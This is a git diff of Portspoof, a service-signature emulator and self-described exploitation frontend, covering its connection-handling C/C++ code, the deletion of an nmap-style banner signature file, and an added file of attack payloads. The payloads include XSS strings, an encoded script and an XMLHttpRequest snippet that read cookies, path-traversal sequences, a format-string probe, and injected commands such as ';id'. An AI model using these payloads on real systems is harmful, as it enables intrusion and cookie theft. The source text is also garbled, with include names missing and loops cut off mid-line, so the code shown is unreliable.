conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + + +#include +#include +#include +#include +#include +#include +#include "Threads.h" +#include "connection.h" +#include "Configuration.h" + + +void nonblock(int sockfd) +{ + int opts; + opts = fcntl(sockfd, F_GETFL); + if(opts < 0) + { + perror("fcntl(F_GETFL)\n"); + exit(1); + } + opts = (opts | O_NONBLOCK); + if(fcntl(sockfd, F_SETFL, opts) < 0) + { + perror("fcntl(F_SETFL)\n"); + exit(1); + } +} + +void* process_connection(void *arg) +{ + int tid = *((int*)(&arg)); + //int len; + string str; + char buffer; + int original_port=DEFAULT_PORT; + int n = 0; + time_t timestamp; + struct sockaddr_in peer_sockaddr; + int peer_sockaddr_len=sizeof(struct sockaddr_in); + char* msg; + + while(1) { + + sleep(1); + for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++) + { + + if(threads[tid].clients[i] != 0) + { + + timestamp = time(NULL); + + if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER)) + n = 1; // just reply... + else + n = recv(threads[tid].clients[i], &buffer,1, 0); + + + // deal with different recv buffer size + if(n == 0){ + + #ifdef OSX + original_port = ntohs(peer_sockaddr.sin_port); + #else + + if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) (socklen_t*) &peer_sockaddr_len )){ + perror("Getsockopt failed"); + goto close_socket; + } + else + original_port = ntohs(peer_sockaddr.sin_port); + + #endif + + //LOG + msg=(char*)malloc(MAX_LOG_MSG_LEN); + memset(msg,0,MAX_LOG_MSG_LEN); + snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,; + Utils::log_write(configuration,msg); + free(msg); + // + + close_socket: + if(configuration->getConfigValue(OPT_DEBUG)) + fprintf(stdout,"Thread nr. %d : client %d closed connection\n",tid, threads[tid].clients[i]); + + close(threads[tid].clients[i]); + + pthread_mutex_lock(&new_connection_mutex); + threads[tid].clients[i] = 0; + threads[tid].client_count--; + pthread_mutex_unlock(&new_connection_mutex); + + } + else if(n < 0){ + + + if(errno == EAGAIN) + { + continue; // Nmap NULL probe (no data) -> skip && go to another socket (client) + } + else if(errno == 104) // Client terminted connection -> get rid of the socket now! + {} + else + fprintf(stdout,"errno: %d\n", errno); + + #ifdef OSX + + + original_port = ntohs(peer_sockaddr.sin_port); + + #else + + if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) &peer_sockaddr_len )){ + perror("Getsockopt failed"); + goto close_socket2; + } + else + original_port = ntohs(peer_sockaddr.sin_port); + + #endif + + //LOG + msg =(char*)malloc(MAX_LOG_MSG_LEN); + memset(msg,0,MAX_LOG_MSG_LEN); + snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,; + Utils::log_write(configuration,msg); + free(msg); + // + + close_socket2: + close(threads[tid].clients[i]); + + pthread_mutex_lock(&new_connection_mutex); + threads[tid].clients[i] = 0; + threads[tid].client_count--; + pthread_mutex_unlock(&new_connection_mutex); + + } + else + { + + #ifdef OSX + // BSD + original_port = ntohs(peer_sockaddr.sin_port); + // + #else + // Linux + if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, (socklen_t*) &peer_sockaddr_len )) + perror("Getsockopt failed"); + original_port = ntohs(peer_sockaddr.sin_port); + // + #endif + + //LOG + char* msg=(char*)malloc(MAX_LOG_MSG_LEN); + memset(msg,0,MAX_LOG_MSG_LEN); + snprintf(msg,MAX_LOG_MSG_LEN,"%d # Service_probe # SIGNATURE_SEND # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,; + Utils::log_write(configuration,msg); + free(msg); + // + + if(configuration->getConfigValue(OPT_DEBUG)) + { + fprintf(stdout,"\n---\nThread nr.%d for port %d \n", tid,original_port); + } + + std::vector vectsignature=configuration->mapPort2Signature(original_port); + + int buffertosendsize=vectsignature.size(); + char* buffertosend= (char*)malloc(buffertosendsize); + + for(int j=0; jgetConfigValue(OPT_DEBUG)) + { + + + fprintf(stdout,"signature sent -> "); + for(int t=0;t + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the @@ -16,16 +16,16 @@ * with this program; if not, see . * * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of + * a combined work based on Portspoof. Thus, the terms and conditions of * the GNU General Public License cover the whole combination. * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or * libraries that are released under the GNU LGPL. You may copy * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. + * Portspoof and the licenses of the other code concerned. * - * Note that people who make modified versions of portspoof are not obligated + * Note that people who make modified versions of Portspoof are not obligated * to grant this special exception for their modified versions; it is their * choice whether to do so. The GNU General Public License gives permission * to release a modified version without this exception; this exception @@ -34,35 +34,12 @@ */ +#include +#include "Threads.h" -#ifdef OPENBSD - -#include -#include -#include #include #include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -#endif - -#include -#include "threads.h" - #include -#include #include #include #include @@ -76,16 +53,30 @@ #include #include #include +#include +#include +#include + #include "revregex.h" +#include "Configuration.h" +#include "Server.h" +#ifndef CONNECTION_H +#define CONNECTION_H #define SO_ORIGINAL_DST 80 #define TCPSTATES +extern pthread_cond_t new_connection_cond; +extern pthread_mutex_t new_connection_mutex; extern Thread threads[MAX_THREADS]; -extern int port; -extern char opts; + +class Configuration; +extern Configuration* configuration; void nonblock(int sockfd); -void process_connection(void *arg); +void* process_connection(void *arg); + + +#endif diff --git a/src/extra_files/.DS_Store b/src/extra_files/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..5008ddfcf53c02e82d7eee2e57c38e5672ef89f6 GIT binary patch literal 6148 zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3 zem<@ulZcFPQ@L2!n>{z**++&mCkOWA81W14cNZlEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ zLs35+`xjp>T0window.onload=function(){document.forms[0].message.value='1';} +x” + + + + + + + + +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); + + + + + + + + + + + + + + + # + # +MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);# +# +%23 + + + + + + + +# +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +? +"> +
? +"> +CLICKME +click +? + +Click%20%20Me +"> +!' +!@#$%%^#$%#$@#$%$$@#$%^^**(() +!@#0%^#0##018387@#0^^**(() +">

yyy +"\t" +# +#' +#' +#xA +#xA#xD +#xD +#xD#xA +$NULL +$null +% +%00 +%00/ +%01%02%03%04%0a%0d%0aADSF +%0a +%20 +%20| +%2500 +%250a +%2A +%2C +%2e%2e%2f +%3C%3F +%5C +%5C/ +%60 +%7C + + + + +' +";id" +(') +* +*' +*' +*| ++%00 +- +-- +-1 +-1.0 +-2 +-20 +-268435455 +..%%35%63 +..%%35c +..%25%35%63 +..%255c +..%5c +..%bg%qf +..%c0%af +..%u2215 +..%u2216 +../ +..\ +/ +/%00/ +/%2A +/' +/' +0 +00 +0xfffffff +1 +1.0 +2 +2147483647 +268435455 +65536 +; +<%20%20script%20>%20<%20/%20script> + +?x=| +@' +@' +A +ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| +FALSE +NULL +TRUE +['] +['] +\ +\"blah +\' +\' +\0 +\00 +\00\00 +\00\00\00 +\0\0 +\0\0\0 +\\ +\\/ +\\\\* +\\\\?\\ +\t +^' +^' +` +id%00 +id%00| +null +something%00html +{'} +{'} +| +} diff --git a/src/log.c b/src/log.c deleted file mode 100644 index b9f5443..0000000 --- a/src/log.c +++ /dev/null @@ -1,49 +0,0 @@ -#include "log.h" -#include -#include -#include -#include - -pthread_cond_t log_cond = PTHREAD_COND_INITIALIZER; -pthread_mutex_t log_mutex = PTHREAD_MUTEX_INITIALIZER; - - -void log_create(char* file){ - - FILE *fp = fopen(log_file, "a"); - if (fp == NULL) { - FILE *fp = fopen(log_file, "w"); - } - - fclose(fp); - return; - -} -void log_write(char* msg) { - - pthread_mutex_lock(&log_mutex); - - if(opts & OPT_LOG_FILE) - { - FILE *fp = fopen(log_file, "a"); - if (fp == NULL) { - printf("Error opening file: %s \n",log_file); - exit(1); - } - - fprintf(fp,"%s",msg); - fclose(fp); - - } - - if(!(opts & OPT_SYSLOG_DIS)) - { - openlog("portspoof", LOG_PID|LOG_CONS, LOG_USER); - syslog(LOG_INFO," %s",msg); - closelog(); - } - pthread_mutex_unlock(&log_mutex); - - return; - -} \ No newline at end of file diff --git a/src/log.h b/src/log.h deleted file mode 100644 index f632d6c..0000000 --- a/src/log.h +++ /dev/null @@ -1,5 +0,0 @@ -#define MAX_LOG_MSG_LEN 200 -#include "portspoof.h" - -void log_create(char* file); -void log_write(char* msg); diff --git a/src/portspoof.c b/src/portspoof.c deleted file mode 100644 index 2090c2f..0000000 --- a/src/portspoof.c +++ /dev/null @@ -1,380 +0,0 @@ -/* - * portspoof Service signature obfucastor - * Copyright (C) 12012 Piotr Duszyński - * - * This program is free software; you can redistribute it and/or modify it - * under the terms of the GNU General Public License as published by the - * Free Software Foundation; either version 2 of the License, or (at your - * option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. - * See the GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License along - * with this program; if not, see . - * - * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of - * the GNU General Public License cover the whole combination. - * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or - * libraries that are released under the GNU LGPL. You may copy - * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. - * - * Note that people who make modified versions of portspoof are not obligated - * to grant this special exception for their modified versions; it is their - * choice whether to do so. The GNU General Public License gives permission - * to release a modified version without this exception; this exception - * also makes it possible to release a modified version which carries - * forward this exception. - */ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#ifdef OPENBSD - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#endif - - -#include "config.h" -#include "portspoof.h" -#include "revregex.h" -#include "threads.h" -#include "connection.h" -#include "log.h" -#include "config_file.h" - -extern char *__progname; - -char opts=0; -char *log_file=LOG_FILE; - -pthread_cond_t new_connection_cond = PTHREAD_COND_INITIALIZER; -pthread_mutex_t new_connection_mutex = PTHREAD_MUTEX_INITIALIZER; - -void -usage(void) -{ - printf("Usage: portspoof [OPTION]...\n" - "Portspoof - service signature obfuscator.\n\n" - "-i bind to a user defined IP address\n" - "-p bind to a user defined PORT number\n" - "-f custom signture file\n" - "-c configuration file\n" - "-l log port scanning alerts to a file\n" - "-d disable syslog\n" - "-v be verbose\n" - "-h display this help and exit\n\n" - "Without any OPTION - use default values and continue"); - - exit(1); -} - -int choose_thread() -{ - int i=MAX_THREADS-1; - int min = i; - while(i >=0) - { - if(threads[i].client_count < threads[min].client_count) - { - min = i; - } - i--; - } - - if(threads[min].client_count==MAX_CLIENT_PER_THREAD) - return -1; - - return min; -} - -int main(int argc, char **argv) -{ - int ch; - char* bind_ip; - char* signature_file=LOG_FILE; - char* configuration_file=CONF_FILE; - int sockd,newsockfd; - int addrlen; - int pid; - struct sockaddr_in my_name, peer_name; - int status; - char buf_file[BUFSIZE]; - int num_lines = 0; - int buf_size=0; - unsigned short int port=DEFAULT_PORT; - - #ifdef CONFDIR - configuration_file = CONFDIR CONFSEPARATOR CONF_FILE; - signature_file = CONFDIR CONFSEPARATOR SIGNATURE_FILE; - #endif - - while ((ch = getopt(argc, argv,"l:i:p:f:c:dvh")) != -1) { - switch (ch) { - case 'i': - bind_ip = optarg; - opts |= OPT_IP; - break; - case 'p': - port = atoi(optarg); - opts |= OPT_PORT; - break; - case 'f': - signature_file = optarg; - opts |= OPT_SIG_FILE; - break; - case 'c': - configuration_file = optarg; - opts |= OPT_CONFIG_FILE; - break; - case 'v': - opts |= OPT_DEBUG; - printf("-> Verbose mode on.\n"); - break; - case 'd': - opts |= OPT_SYSLOG_DIS; - printf("-> Syslog logging disabled.\n"); - break; - case 'l': - opts |= OPT_LOG_FILE; - log_file = optarg; - printf("-> Using log file %s\n",log_file); - break; - case 'h': - usage(); - break; - default: - printf("Try ` %s -h' for more information.\n\n", __progname); - exit(0); - break; - } - } - - - if( !(opts&OPT_IP || opts&OPT_PORT || opts&OPT_DEBUG || opts&OPT_SIG_FILE || opts&OPT_LOG_FILE || opts&OPT_SYSLOG_DIS || opts&OPT_CONFIG_FILE)) - { - printf("-> No parameters - using default values.\n"); - } - - - //check log file - if(opts & OPT_LOG_FILE) - log_create(log_file); - - // open file - if(opts & OPT_SIG_FILE) - printf("-> Using user defined signature file %s\n",signature_file); - - FILE *fp = fopen(signature_file, "r"); - if (fp == NULL) { - printf("Error opening file: %s \n",signature_file); - exit(1); - } - - // get number of lines - while (fgets(buf_file, BUFSIZE, fp)) - if (!(strlen(buf_file) == BUFSIZE-1 && buf_file[BUFSIZE-2] != '\n')) - { - num_lines++; - } - - int config_nr_of_payloads=0; - if(opts & OPT_CONFIG_FILE) - config_nr_of_payloads=get_nr_of_payloads(configuration_file); - - // allocate memory - arr_lines2 = malloc((num_lines+config_nr_of_payloads) * sizeof(struct signature*)); - - int i=0; - for(;icptr=process_signature(tmp,&len); - ((signature*)(arr_lines2[num_lines]))->len=len; - num_lines++; - } - - fclose(fp); - - i=0; - int tmpi=0; - srand(time(0)); - // set portspoof mapping - for(;i Using configuration file %s\n",configuration_file); - - if(process_config_file(arr_lines2,signatures,num_lines,configuration_file)) - exit(1); - } - - /* create thread pool */ - for(i = 0; i < MAX_THREADS; i++) - { - pthread_create(&threads[i].tid, NULL, process_connection, (void *) i); - threads[i].client_count = 0; - } - - /* create a socket */ - sockd = socket(PF_INET, SOCK_STREAM, 0); - if (sockd == -1) - { - perror("Socket creation error"); - exit(1); - } - - int n = 1; - setsockopt(sockd, SOL_SOCKET, SO_REUSEADDR , &n, sizeof(n)); - - /* server address - by default localhost */ - my_name.sin_family = PF_INET; - if(opts & OPT_IP) - { - printf("-> Binding to iface: %s\n",bind_ip); - inet_aton(bind_ip, &my_name.sin_addr.s_addr); - - } - else - my_name.sin_addr.s_addr = INADDR_ANY; - - if(opts & OPT_PORT) - { - printf("-> Binding to port: %d\n",port); - my_name.sin_port = htons(port); - - } - else - my_name.sin_port = htons(DEFAULT_PORT); - - status = bind(sockd, (struct sockaddr*)&my_name, sizeof(my_name)); - if (status == -1) - { - perror("Binding error"); - exit(1); - } - - // Set queue sizeof - status = listen(sockd, 10); - if (status == -1) - { - perror("Listen set error"); - exit(1); - } - int choosen; - while(1) - { - /* wait for a connection */ - addrlen = sizeof(peer_name); - newsockfd = accept(sockd, (struct sockaddr*)&peer_name, &addrlen); - - if (newsockfd < 0) - perror("ERROR on accept"); - else{ - - nonblock(newsockfd); - - start: - pthread_mutex_lock(&new_connection_mutex); - choosen=choose_thread(); - - - if( choosen == -1) - { - pthread_mutex_unlock(&new_connection_mutex); - sleep(1); - goto start; - } - - - if(opts & OPT_DEBUG) - fprintf(stderr," new conn - thread choosen: %d - nr. of connections already in queue: %d\n",choosen,threads[choosen].client_count); - - for(i = 0; i < MAX_CLIENT_PER_THREAD; i++) - { - if(threads[choosen].clients[i] == 0) - { - threads[choosen].clients[i] = newsockfd; - threads[choosen].client_count++; - break; - } - } - pthread_mutex_unlock(&new_connection_mutex); - - } - } - - return 0; -} diff --git a/src/portspoof.conf b/src/portspoof.conf deleted file mode 100644 index 7c8ba66..0000000 --- a/src/portspoof.conf +++ /dev/null @@ -1,15 +0,0 @@ -#This is an example signature mapping configuration file - -#Send custom payload (this can be a simple string) - -8080-8100 "What are you looking for?" - -#Send custom payload (this can be a hex encoded) - -8101 "\x68\x65\x78\x65\x6e\x63\x6f\x64\x65\x64\x3a\x57\x68\x61\x74\x20\x61\x72\x65\x20\x79\x6f\x75\x20\x6c\x6f\x6f\x6b\x69\x6e\x67\x20\x66\x6f\x72\x3f" - -#Send custom payload (this can be a simple regex) - -8102 "regex: [\d]* [a-b]* [1-5]* [\w]* \d+ \w+ . \." - - diff --git a/src/revregex.c b/src/revregex.cpp old mode 100644 new mode 100755 similarity index 79% rename from src/revregex.c rename to src/revregex.cpp index dc58ffe..c142b08 --- a/src/revregex.c +++ b/src/revregex.cpp @@ -1,6 +1,6 @@ /* - * portspoof Service signature obfucastor - * Copyright (C) 12012 Piotr Duszyński + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the @@ -16,16 +16,16 @@ * with this program; if not, see . * * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of + * a combined work based on Portspoof. Thus, the terms and conditions of * the GNU General Public License cover the whole combination. * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or * libraries that are released under the GNU LGPL. You may copy * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. + * Portspoof and the licenses of the other code concerned. * - * Note that people who make modified versions of portspoof are not obligated + * Note that people who make modified versions of Portspoof are not obligated * to grant this special exception for their modified versions; it is their * choice whether to do so. The GNU General Public License gives permission * to release a modified version without this exception; this exception @@ -33,7 +33,8 @@ * forward this exception. */ -#include "config.h" +// TODO: TO BE ENTIRELY REWRITTEN! + #include "revregex.h" int signatures[SIGNATURES_SIZE]; @@ -43,13 +44,13 @@ char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen) //index: '[' ... ']' { //TODO hex support - int bslash='\\'; - int word='w'; - int digit='d'; - int range='-'; + char bslash='\\'; + char word='w'; + char digit='d'; + char range='-'; //flags - char not=0; + char nnot=0; char wordf=0; char digitf=0; char rangeword=0; @@ -68,11 +69,11 @@ char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen) if( str[i]=='^') //not flag { - i++;not=1; + i++;nnot=1; } // DEBUG - //printf("%d %d",i,end_offset); + //fprintf(stdout,"%d %d",i,end_offset); for(i;i process_signature(std::string str) { + //cout< result_vector; + + for(int i=0; i + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the @@ -16,16 +16,16 @@ * with this program; if not, see . * * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of + * a combined work based on Portspoof. Thus, the terms and conditions of * the GNU General Public License cover the whole combination. * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or * libraries that are released under the GNU LGPL. You may copy * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. + * Portspoof and the licenses of the other code concerned. * - * Note that people who make modified versions of portspoof are not obligated + * Note that people who make modified versions of Portspoof are not obligated * to grant this special exception for their modified versions; it is their * choice whether to do so. The GNU General Public License gives permission * to release a modified version without this exception; this exception @@ -33,6 +33,7 @@ * forward this exception. */ + #include #include #include @@ -41,24 +42,16 @@ #include #include #include +#include +#include +#include -#define BUFSIZE 1024 +using namespace std; + +#define BUFSIZE 2048 #define SIGNATURES_SIZE 65535 // max port range -#ifndef REVREGEX_VARS -#define REVREGEX_VARS - -typedef struct { - int len; - char* cptr; -} signature; - - -extern int signatures[SIGNATURES_SIZE]; -extern int num_signatures; -extern struct signature **arr_lines2; -#endif - +std::vector process_signature(std::string str); char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen); char * fill_specialchars(char * str, int* param_len, int start_offset,int end_offset); @@ -66,6 +59,5 @@ char* revregex(char * param_str,int* param_len,int start_offset,int end_offset); int char2hex(char* ptr); int ishex(char* ch); char * escape_hex(char* str,int* final_len); -char * process_signature(const char* str, int* len); diff --git a/src/signatures b/src/signatures deleted file mode 100644 index 688401a..0000000 --- a/src/signatures +++ /dev/null @@ -1,1824 +0,0 @@ -S\xf5\xc6\x1a{ -\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) -.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 -\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n -200 NOD32SS ([\d.]+) \((\d+)\)\r\n - -\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 -\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 -\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 -MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 -Asterisk Call Manager/([\d.]+)\r\n -Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n -220 jeem\.mail\.pv ESMTP\r\n -\r\nUser Access Verification\r\n\r\nYour PassWord: -echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe -220 Bot Server \(Win32\)\r\n -PWD -=+\n= +RBackdoor ([\d.]+) -220 Windrone Server \(Win32\)\r\n -220 Reptile welcomes you\.\.\r\n -MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. -220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n -A-311 Death welcome\x001 -\x01\0\0\0 -HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n -0x[0-9a-fA-F]{32}L -\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 -\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 -\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 -BZFS\d\d\d\d\r\n\r\n -ACK\x01 -\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 -\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\*\x01..\0\x04\0\0\0\x01 -Cirrato Client ([\w._-]+)\0 -200.*Citadel(?:/UX)? -\x7f\x7fICA\0\x7f\x7fICA\0 -.\0\0\0\x81\0\0\0\x01 -\0\0\0\x10ClsBoolVersion 1 -CFMSERV\(1\)\n -Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> -Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> -\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 -Crestron Terminal Protocol Console opened\r\n -\r\nCrestron Terminal Protocol Console Opened\r\n\r\n -\x0f\0\x01\x02 -/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n -\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n -\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n -\xaf\x01 -220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) -0000019a[0-9a-f]{402}\r\n -220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n -\0\0\0\x0c\0\0\0\?\0\0\0\x02 -0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL -\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B -\(m\xe9l@k\xb7\xf5\x03 -\(m\xe9l@k\xb3\xf7\x1e\xa5 -\(m\xe9l@k\xb1\xf1\x15\xa5 -\?\x008 \xc3p EFTSRV1 ([\d.]+) -\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n -7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp -Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n -\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: -Welcome to FreeVCS MSSQL NT Service\r\n -Welcome to FreeVCS DBISAM NT Service\r\n -FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n -220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n -220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n -220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n -530 Connection refused, unknown IP address\.\r\n -220 IIS ([\w._-]+) FTP\r\n -220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n -220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n -220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n -220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n -500 OOPS: (could not bind listening IPv4 